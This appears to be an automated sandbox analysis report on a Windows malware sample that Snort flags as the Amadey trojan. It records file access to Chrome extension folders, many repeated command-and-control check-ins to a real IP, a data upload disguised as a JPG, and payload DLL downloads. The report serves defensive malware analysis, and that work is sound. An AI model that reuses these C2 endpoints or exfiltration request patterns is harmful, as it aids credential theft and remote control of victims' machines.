                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe Code function: 0_2_00406917 _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,0_2_00406917
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

                              Networking:

                              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                              Source: Traffic Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.4:49744 -> 89.184.92.210:80
                              Source: Traffic Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49750 -> 176.111.174.114:80
                              Source: Traffic Snort IDS: 100000118 COMMUNITY WEB-CLIENT Internet Explorer URLMON.DLL Content-Type Overflow Attempt 176.111.174.114:80 -> 192.168.2.4:49782
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49784 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49785 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49787 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49789 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49790 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49791 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49793 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49794 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49795 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49796 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49797 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49798 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49799 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49800 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49801 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49802 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49803 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49804 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49805 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49806 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49807 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49808 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49809 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49810 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49811 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49812 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49813 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49814 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49815 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49816 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49817 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49818 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49819 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49820 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49821 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49822 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49823 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49826 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49827 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49830 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49831 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49833 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49835 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49838 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49839 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49841 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49842 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49844 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49846 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49848 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49850 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49851 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49853 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49855 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49856 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49857 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49859 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49861 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49863 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49864 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49866 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49867 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49868 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49870 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49871 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49872 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49873 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49874 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49876 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49877 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49879 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49880 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49881 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49882 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49884 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49885 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49886 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49887 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49888 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49890 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49891 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49893 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49894 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49895 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49896 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49901 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49904 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49905 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49906 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49910 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49911 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49913 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49915 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49916 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49917 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49918 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49921 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49925 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49926 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49928 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49929 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49930 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49935 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49937 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49939 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49944 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49945 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49947 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49950 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49952 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49953 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49955 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49956 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49957 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49958 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49960 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49961 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49963 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49964 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49965 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49966 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49968 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49969 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49970 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49971 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49973 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49974 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49976 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49977 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49979 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49980 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49981 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49982 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49983 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49985 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49986 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49988 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49989 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49990 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49992 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49993 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49994 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49995 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49997 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49998 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50000 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50001 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50002 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50003 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50005 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50006 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50007 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50008 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50010 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50011 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50012 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50014 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50015 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50017 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50019 -> 176.111.174.114:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50020 -> 176.111.174.114:80
                              Posts data to a JPG file (protocol mismatch)
                              Source: unknown HTTP traffic detected: POST //Hnq8vS/index.php?scr=up HTTP/1.1 Host: 176.111.174.114 User-Agent: Uploador Content-Type: multipart/form-data; boundary=152138533219.jpg Connection: Keep-Alive Content-Length: 227184
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Apr 2021 20:58:42 GMT Content-Type: application/x-msdos-program Content-Length: 334288 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "519d0-57aa1f0b0df80" Expires: Thu, 29 Apr 2021 20:58:42 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Apr 2021 20:58:42 GMT Content-Type: application/x-msdos-program Content-Length: 137168 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "217d0-57aa1f0b0df80" Expires: Thu, 29 Apr 2021 20:58:42 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Apr 2021 20:58:42 GMT Content-Type: application/x-msdos-program Content-Length: 440120 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "6b738-57aa1f0b0df80" Expires: Thu, 29 Apr 2021 20:58:42 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Apr 2021 20:58:43 GMT Content-Type: application/x-msdos-program Content-Length: 1246160 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "1303d0-57aa1f0b0df80" Expires: Thu, 29 Apr 2021 20:58:43 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Apr 2021 20:58:44 GMT Content-Type: application/x-msdos-program Content-Length: 144848 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "235d0-57aa1f0b0df80" Expires: Thu, 29 Apr 2021 20:58:44 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Apr 2021 20:58:44 GMT Content-Type: application/x-msdos-program Content-Length: 83784 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "14748-57aa1f0b0df80" Expires: Thu, 29 Apr 2021 20:58:44 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Apr 2021 20:58:52 GMT Content-Type: application/octet-stream Content-Length: 290304 Last-Modified: Wed, 28 Apr 2021 08:31:27 GMT Connection: keep-alive ETag: "60891d5f-46e00" Cache-Control: public, must-revalidate, proxy-revalidate Accept-Ranges: bytes
                              Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Wed, 28 Apr 2021 20:59:10 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Fri, 23 Apr 2021 10:22:14 GMT ETag: "1f200-5c0a12b672180" Accept-Ranges: bytes Content-Length: 127488 Content-Type: application/octet-stream
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Apr 2021 20:59:21 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16Last-Modified: Fri, 23 Apr 2021 10:22:18 GMTETag: "37800-5c0a12ba42a80"Accept-Ranges: bytesContent-Length: 227328Content-Type: application/octet-stream
                              Source: global trafficHTTP traffic detected: POST /873 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 78.47.81.226Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                              Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
